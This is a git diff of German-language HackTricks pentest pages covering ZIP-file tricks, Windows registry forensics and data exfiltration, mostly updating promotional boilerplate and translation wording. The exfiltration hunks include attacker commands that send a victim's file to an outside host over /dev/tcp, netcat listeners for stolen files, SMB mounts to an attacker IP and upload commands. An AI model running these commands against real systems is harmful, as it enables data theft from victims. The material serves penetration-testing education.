diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md index c1034f81f..b01768de4 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md @@ -1,44 +1,46 @@ # ZIP-Tricks +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories einreichen.
+{% endhint %} -**Befehlszeilentools** zur Verwaltung von **ZIP-Dateien** sind unerlässlich, um ZIP-Dateien zu diagnostizieren, zu reparieren und zu knacken. Hier sind einige wichtige Dienstprogramme: +**Befehlszeilentools** zur Verwaltung von **Zip-Dateien** sind unerlässlich für die Diagnose, Reparatur und das Knacken von Zip-Dateien. Hier sind einige wichtige Dienstprogramme: -- **`unzip`**: Zeigt an, warum eine ZIP-Datei nicht dekomprimiert werden kann. -- **`zipdetails -v`**: Bietet eine detaillierte Analyse der Felder des ZIP-Dateiformats. -- **`zipinfo`**: Listet den Inhalt einer ZIP-Datei auf, ohne sie zu extrahieren. -- **`zip -F input.zip --out output.zip`** und **`zip -FF input.zip --out output.zip`**: Versuchen, beschädigte ZIP-Dateien zu reparieren. -- **[fcrackzip](https://github.com/hyc/fcrackzip)**: Ein Tool zum Brute-Force-Knacken von ZIP-Passwörtern, das für Passwörter bis zu etwa 7 Zeichen effektiv ist. +- **`unzip`**: Zeigt an, warum eine Zip-Datei möglicherweise nicht dekomprimiert werden kann. +- **`zipdetails -v`**: Bietet eine detaillierte Analyse der Felder des Zip-Dateiformats. +- **`zipinfo`**: Listet den Inhalt einer Zip-Datei auf, ohne sie zu extrahieren. +- **`zip -F input.zip --out output.zip`** und **`zip -FF input.zip --out output.zip`**: Versuchen, beschädigte Zip-Dateien zu reparieren. +- **[fcrackzip](https://github.com/hyc/fcrackzip)**: Ein Tool zum Brute-Force-Knacken von Zip-Passwörtern, effektiv für Passwörter bis zu etwa 7 Zeichen. -Die [Spezifikation des ZIP-Dateiformats](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) enthält umfassende Details zur Struktur und den Standards von ZIP-Dateien. +Die [Spezifikation des Zip-Dateiformats](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) bietet umfassende Details zur Struktur und den Standards von Zip-Dateien. -Es ist wichtig zu beachten, dass passwortgeschützte ZIP-Dateien **Dateinamen oder Dateigrößen nicht verschlüsseln**, eine Sicherheitslücke, die nicht bei RAR- oder 7z-Dateien gemeinsam ist, die diese Informationen verschlüsseln. Darüber hinaus sind ZIP-Dateien, die mit der älteren Methode ZipCrypto verschlüsselt sind, anfällig für einen **Klartextangriff**, wenn eine unverschlüsselte Kopie einer komprimierten Datei verfügbar ist. Dieser Angriff nutzt den bekannten Inhalt, um das Passwort der ZIP-Datei zu knacken, eine Schwachstelle, die in [HackThis's Artikel](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) detailliert beschrieben und in [diesem wissenschaftlichen Artikel](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf) weiter erläutert wird. ZIP-Dateien, die jedoch mit **AES-256**-Verschlüsselung gesichert sind, sind immun gegen diesen Klartextangriff, was die Bedeutung der Auswahl sicherer Verschlüsselungsmethoden für sensible Daten zeigt. +Es ist wichtig zu beachten, dass passwortgeschützte Zip-Dateien **Dateinamen oder Dateigrößen nicht verschlüsseln**, ein Sicherheitsfehler, der nicht bei RAR- oder 7z-Dateien auftritt, die diese Informationen verschlüsseln. Darüber hinaus sind Zip-Dateien, die mit der älteren ZipCrypto-Methode verschlüsselt sind, anfällig für einen **Klartextangriff**, wenn eine unverschlüsselte Kopie einer komprimierten Datei verfügbar ist. Dieser Angriff nutzt den bekannten Inhalt, um das Passwort der Zip-Datei zu knacken, eine Schwachstelle, die in einem Artikel von [HackThis](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) detailliert beschrieben und in [diesem wissenschaftlichen Artikel](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf) weiter erläutert wird. Zip-Dateien, die jedoch mit der **AES-256**-Verschlüsselung gesichert sind, sind immun gegen diesen Klartextangriff, was die Bedeutung der Auswahl sicherer Verschlüsselungsmethoden für sensible Daten zeigt. ## Referenzen -* [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/) +* [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/) + +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories einreichen.
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md index 7ce70051d..9def4c2fa 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md @@ -2,87 +2,107 @@ ### Interessante Windows-Registrierungsschlüssel +{% hint style="success" %} +Lernen Sie und üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie und üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.
+{% endhint %} ### **Windows-Version und Eigentümerinformationen** -- Unter **`Software\Microsoft\Windows NT\CurrentVersion`** finden Sie die Windows-Version, den Service Pack, die Installationszeit und den Namen des registrierten Eigentümers auf einfache Weise. +- Unter **`Software\Microsoft\Windows NT\CurrentVersion`** finden Sie die Windows-Version, das Service Pack, die Installationszeit und den Namen des registrierten Eigentümers auf einfache Weise. ### **Computername** - Der Hostname befindet sich unter **`System\ControlSet001\Control\ComputerName\ComputerName`**. ### **Zeitzoneneinstellung** -- Die Zeitzoneneinstellung des Systems wird in **`System\ControlSet001\Control\TimeZoneInformation`** gespeichert. +- Die Zeitzoneneinstellung des Systems wird unter **`System\ControlSet001\Control\TimeZoneInformation`** gespeichert. ### **Zugriffszeitverfolgung** - Standardmäßig ist die Verfolgung der letzten Zugriffszeit deaktiviert (**`NtfsDisableLastAccessUpdate=1`**). Um sie zu aktivieren, verwenden Sie: `fsutil behavior set disablelastaccess 0` ### Windows-Versionen und Service Packs -- Die **Windows-Version** gibt die Edition (z. B. Home, Pro) und ihre Veröffentlichung (z. B. Windows 10, Windows 11) an, während **Service Packs** Updates sind, die Fehlerbehebungen und manchmal neue Funktionen enthalten. +- Die **Windows-Version** gibt die Edition an (z. B. Home, Pro) und ihre Veröffentlichung (z. B. Windows 10, Windows 11), während **Service Packs** Updates sind, die Fixes und manchmal neue Funktionen enthalten. ### Aktivieren der letzten Zugriffszeit -- Durch das Aktivieren der Verfolgung der letzten Zugriffszeit können Sie sehen, wann Dateien zuletzt geöffnet wurden, was für forensische Analysen oder Systemüberwachung entscheidend sein kann. +- Das Aktivieren der Verfolgung der letzten Zugriffszeit ermöglicht es Ihnen zu sehen, wann Dateien zuletzt geöffnet wurden, was für forensische Analysen oder Systemüberwachung entscheidend sein kann. ### Netzwerkinformationsdetails -- Die Registrierung enthält umfangreiche Daten zu Netzwerkkonfigurationen, einschließlich **Arten von Netzwerken (drahtlos, Kabel, 3G)** und **Netzwerkkategorien (Öffentlich, Privat/Heim, Domäne/Arbeit)**, die für das Verständnis von Netzwerksicherheitseinstellungen und Berechtigungen wichtig sind. +- Die Registrierung enthält umfangreiche Daten zu Netzwerkkonfigurationen, einschließlich **Arten von Netzwerken (drahtlos, Kabel, 3G)** und **Netzwerkkategorien (Öffentlich, Privat/Zuhause, Domäne/Arbeit)**, die für das Verständnis von Netzwerksicherheitseinstellungen und Berechtigungen wichtig sind. -### Clientseitiges Zwischenspeichern (CSC) -- **CSC** verbessert den Offline-Zugriff auf Dateien, indem Kopien freigegebener Dateien zwischengespeichert werden. Unterschiedliche **CSCFlags**-Einstellungen steuern, wie und welche Dateien zwischengespeichert werden, was sich auf Leistung und Benutzererfahrung auswirkt, insbesondere in Umgebungen mit intermittierender Konnektivität. +### Clientseitiges Caching (CSC) +- **CSC** verbessert den Offline-Zugriff auf Dateien, indem Kopien von freigegebenen Dateien zwischengespeichert werden. Unterschiedliche **CSCFlags**-Einstellungen steuern, wie und welche Dateien zwischengespeichert werden, was die Leistung und Benutzererfahrung beeinflusst, insbesondere in Umgebungen mit intermittierender Konnektivität. ### Automatisch startende Programme -- Programme, die in verschiedenen `Run`- und `RunOnce`-Registrierungsschlüsseln aufgeführt sind, werden automatisch beim Start ausgeführt und beeinflussen die Systemstartzeit und können potenziell interessante Punkte zur Identifizierung von Malware oder unerwünschter Software sein. +- Programme, die in verschiedenen `Run`- und `RunOnce`-Registrierungsschlüsseln aufgeführt sind, werden automatisch beim Start ausgeführt, was die Systemstartzeit beeinflusst und potenziell interessante Punkte zur Identifizierung von Malware oder unerwünschter Software darstellen kann. ### Shellbags -- **Shellbags** speichern nicht nur Einstellungen für Ordneransichten, sondern liefern auch forensische Beweise für den Zugriff auf Ordner, auch wenn der Ordner nicht mehr vorhanden ist. Sie sind für Untersuchungen von unschätzbarem Wert und zeigen Benutzeraktivitäten auf, die auf andere Weise nicht offensichtlich sind. +- **Shellbags** speichern nicht nur Präferenzen für Ordneransichten, sondern liefern auch forensische Beweise für den Zugriff auf Ordner, auch wenn der Ordner nicht mehr existiert. Sie sind für Untersuchungen unverzichtbar und zeigen Benutzeraktivitäten auf, die auf andere Weise nicht offensichtlich sind. ### USB-Informationen und Forensik -- Die im Registrierungsschlüssel gespeicherten Details zu USB-Geräten können dabei helfen, welche Geräte mit einem Computer verbunden waren, und möglicherweise eine Verbindung eines Geräts mit sensiblen Dateiübertragungen oder unbefugtem Zugriff herstellen. +- Die im Registrierungsspeicher gespeicherten Details zu USB-Geräten können dabei helfen, festzustellen, welche Geräte mit einem Computer verbunden waren, und möglicherweise eine Verbindung eines Geräts zu sensiblen Dateiübertragungen oder unbefugten Zugriffsvorfällen herstellen. -### Volumeseriennummer -- Die **Volumeseriennummer** kann entscheidend sein, um die spezifische Instanz eines Dateisystems zu verfolgen, was in forensischen Szenarien nützlich ist, in denen der Dateiursprung über verschiedene Geräte hinweg ermittelt werden muss. +### Volumenseriennummer +- Die **Volumenseriennummer** kann entscheidend sein, um die spezifische Instanz eines Dateisystems zu verfolgen, was in forensischen Szenarien nützlich ist, in denen die Herkunft einer Datei über verschiedene Geräte hinweg festgestellt werden muss. -### **Shutdown-Details** -- Die Shutdown-Zeit und die Anzahl der Neustarts (nur für XP) werden in **`System\ControlSet001\Control\Windows`** und **`System\ControlSet001\Control\Watchdog\Display`** gespeichert. +### **Herunterfahrdetails** +- Herunterfahrzeit und -anzahl (letztere nur für XP) werden in **`System\ControlSet001\Control\Windows`** und **`System\ControlSet001\Control\Watchdog\Display`** aufbewahrt. ### **Netzwerkkonfiguration** - Für detaillierte Informationen zur Netzwerkschnittstelle siehe **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**. -- Erste und letzte Netzwerkverbindungsziten, einschließlich VPN-Verbindungen, werden unter verschiedenen Pfaden in **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`** protokolliert. +- Erste und letzte Netzwerkverbindungszeiten, einschließlich VPN-Verbindungen, werden unter verschiedenen Pfaden in **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`** protokolliert. ### **Freigegebene Ordner** -- Freigegebene Ordner und Einstellungen befinden sich unter **`System\ControlSet001\Services\lanmanserver\Shares`**. Die Einstellungen für das clientseitige Zwischenspeichern (CSC) bestimmen die Verfügbarkeit von Offline-Dateien. +- Freigegebene Ordner und Einstellungen befinden sich unter **`System\ControlSet001\Services\lanmanserver\Shares`**. Die Einstellungen für das clientseitige Caching (CSC) bestimmen die Verfügbarkeit von Offline-Dateien. ### **Programme, die automatisch starten** -- Pfade wie **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** und ähnliche Einträge unter `Software\Microsoft\Windows\CurrentVersion` geben Auskunft über Programme, die beim Start ausgeführt werden sollen. +- Pfade wie **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** und ähnliche Einträge unter `Software\Microsoft\Windows\CurrentVersion` geben Details zu Programmen, die beim Start ausgeführt werden sollen. ### **Suchen und eingegebene Pfade** - Explorer-Suchen und eingegebene Pfade werden in der Registrierung unter **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** für WordwheelQuery und TypedPaths verfolgt. ### **Zuletzt verwendete Dokumente und Office-Dateien** -- Zuletzt verwendete Dokumente und aufgerufene Office-Dateien werden in `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` und spezifischen Office-Version-Pfaden vermerkt. +- Zuletzt verwendete Dokumente und Office-Dateien werden in `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` und spezifischen Office-Version-Pfaden vermerkt. ### **Zuletzt verwendete (MRU) Elemente** - MRU-Listen, die kürzlich verwendete Dateipfade und Befehle anzeigen, werden in verschiedenen `ComDlg32`- und `Explorer`-Unterschlüsseln unter `NTUSER.DAT` gespeichert. ### **Benutzeraktivitätsverfolgung** -- Die Funktion "User Assist" protokolliert detaillierte Statistiken zur Anwendungsnutzung, einschließlich der Anzahl der Ausführungen und der letzten Ausführungszeit, unter **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**. +- Das User Assist-Feature protokolliert detaillierte Anwendungsverwendungsinformationen, einschließlich Ausführungszähler und letzter Ausführungszeit, unter **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**. ### **Shellbags-Analyse** -- Shellbags, die Details zum Zugriff auf Ordner anzeigen, werden in `USRCLASS.DAT` und `NTUSER.DAT` unter `Software\Microsoft\Windows\Shell` gespeichert. Verwenden Sie **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** zur Analyse. +- Shellbags, die Details zum Ordnerzugriff anzeigen, werden in `USRCLASS.DAT` und `NTUSER.DAT` unter `Software\Microsoft\Windows\Shell` gespeichert. Verwenden Sie **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** für die Analyse. ### **USB-Geräteverlauf** - **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** und **`HKLM\SYSTEM\ControlSet001\Enum\USB`** enthalten umfangreiche Details zu angeschlossenen USB-Geräten, einschließlich Hersteller, Produktname und Verbindungszeitstempel. - Der Benutzer, der mit einem bestimmten USB-Gerät verbunden ist, kann durch Suche in den `NTUSER.DAT`-Hives nach der **{GUID}** des Geräts ermittelt werden. -- Das zuletzt eingebundene Gerät und seine Volumeseriennummer können über `System\MountedDevices` bzw. `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt` verfolgt +- Das zuletzt eingebundene Gerät und seine Volumenseriennummer können über `System\MountedDevices` und `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt` zurückverfolgt werden. + +Dieser Leitfaden fasst die wesentlichen Pfade und Methoden zur Zugriff auf detaillierte Informationen zu Systemen, Netzwerken und Benutzeraktivitäten auf Windows-Systemen zusammen, mit dem Ziel von Klarheit und Benutzerfreundlichkeit. + + + +{% hint style="success" %} +Lernen Sie und üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie und üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Unterstützen Sie HackTricks + +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/exfiltration.md b/generic-methodologies-and-resources/exfiltration.md index d7c8bb320..771bbdd57 100644 --- a/generic-methodologies-and-resources/exfiltration.md +++ b/generic-methodologies-and-resources/exfiltration.md @@ -1,18 +1,19 @@ # Exfiltration +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks im PDF-Format herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merch**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories einreichen.
+{% endhint %} **Try Hard Security Group** @@ -22,9 +23,9 @@ Andere Möglichkeiten, HackTricks zu unterstützen: *** -## Häufig weißgelistete Domains zur Informationsweiterleitung +## Häufig whitelistete Domains zum Exfiltrieren von Informationen -Überprüfen Sie [https://lots-project.com/](https://lots-project.com/), um häufig weißgelistete Domains zu finden, die missbraucht werden können +Überprüfen Sie [https://lots-project.com/](https://lots-project.com/), um häufig whitelistete Domains zu finden, die missbraucht werden können ## Kopieren & Einfügen Base64 @@ -65,7 +66,7 @@ Start-BitsTransfer -Source $url -Destination $output -Asynchronous ### Dateien hochladen * [**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170) -* [**SimpleHttpServer, das GET- und POST-Anforderungen (auch Header) druckt**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149) +* [**SimpleHttpServer printing GET and POSTs (also headers)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149) * Python-Modul [uploadserver](https://pypi.org/project/uploadserver/): ```bash # Listen to files @@ -79,7 +80,7 @@ curl -X POST http://HOST/upload -H -F 'files=@file.txt' # With basic auth: # curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world ``` -### **HTTPS-Server** +### **HTTPS Server** ```python # from https://gist.github.com/dergachev/7028596 # taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/ @@ -185,17 +186,22 @@ guest ok = Yes #Start samba service smbd restart ``` +Windows + +--- + ### Exfiltration -Exfiltration techniques are used to steal data from a target network. Once an attacker gains access to a system, they need to find a way to get the data out without being detected. There are several methods to exfiltrate data, including: +Exfiltration is the unauthorized transfer of data from a target. There are various methods to exfiltrate data from a compromised system. Some common exfiltration methods include: -- **Compression**: Compressing data before exfiltration can help evade detection. -- **Encryption**: Encrypting the data makes it harder for security tools to detect. -- **Steganography**: Hiding data within other files or images can be a stealthy way to exfiltrate information. -- **DNS Tunneling**: Using DNS requests to send data out of a network can bypass some security controls. -- **Exfiltration over Alternative Protocols**: Using protocols like ICMP or HTTP to exfiltrate data can also help avoid detection. +- **Email**: Sending data as email attachments to an external email account. +- **FTP**: Transferring data using the File Transfer Protocol to an external server. +- **DNS**: Encoding data within DNS requests to leak information. +- **HTTP/HTTPS**: Sending data over HTTP or HTTPS to a remote server. +- **Steganography**: Hiding data within other files to avoid detection. +- **Cloud Storage**: Uploading data to cloud storage services. -Attackers may also use tools like **PowerShell** or **WMI** for exfiltration, as these are built-in to Windows and may not be detected by security tools. +Attackers may use one or more of these methods to exfiltrate sensitive information from a target network. It is essential for defenders to monitor and control outbound network traffic to detect and prevent exfiltration attempts. ```bash CMD-Wind> \\10.10.14.14\path\to\exe CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials @@ -230,10 +236,6 @@ nc -lvnp 80 > file #Inside attacker cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim ``` ### Datei auf das Opfer hochladen - -Upload a file to the victim's machine. - -Laden Sie eine Datei auf den Computer des Opfers hoch. ```bash nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker # Inside victim @@ -294,7 +296,9 @@ echo " python -m SimpleHTTPServer 80 ``` @@ -353,17 +357,18 @@ Dann kopieren Sie den Text in die Windows-Shell, und eine Datei namens nc.exe wi {% embed url="https://discord.gg/tryhardsecurity" %} +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks in PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merch**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegramm-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories senden.
